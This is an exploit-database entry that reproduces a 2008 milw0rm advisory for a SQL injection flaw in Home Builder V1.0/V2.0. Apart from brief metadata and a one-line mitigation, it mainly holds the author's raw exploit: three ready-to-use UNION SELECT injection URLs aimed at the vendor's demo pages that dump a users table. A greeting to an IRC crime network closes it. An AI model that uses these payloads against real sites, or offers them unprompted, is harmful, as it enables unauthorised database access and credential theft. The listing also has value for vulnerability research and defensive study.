header-logo
Suggest Exploit
vendor:
Home Builder
by:
AlpHaNiX
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Home Builder
Affected Version From: V1.0
Affected Version To: V2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:aspsiteware:home_builder
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Home Builder V1.0 / V2.0

A SQL injection vulnerability exists in Home Builder V1.0 / V2.0. An attacker can send a specially crafted HTTP request to the vulnerable application and execute arbitrary SQL commands in the back-end database, allowing them to access or modify critical application data, compromise the application, and potentially compromise the underlying system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : Home Builder V1.0 / V2.0
#download : null
#Demo     : http://www.aspsiteware.com/Home1/
	    http://www.aspsiteware.com/home2/home2/


###########################################################################

#Exploits :

--=[SQL INJECTION]=--
http://www.aspsiteware.com/Home1/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
http://www.aspsiteware.com/home2/home2/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
http://www.aspsiteware.com/home2/home2/type2.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users


#Greetz For CrimeIRC NetWork  [ IRC.CrimeIRC.Net ] Syst3m UnkOwn and all Staff

###########################################################################

# milw0rm.com [2008-12-14]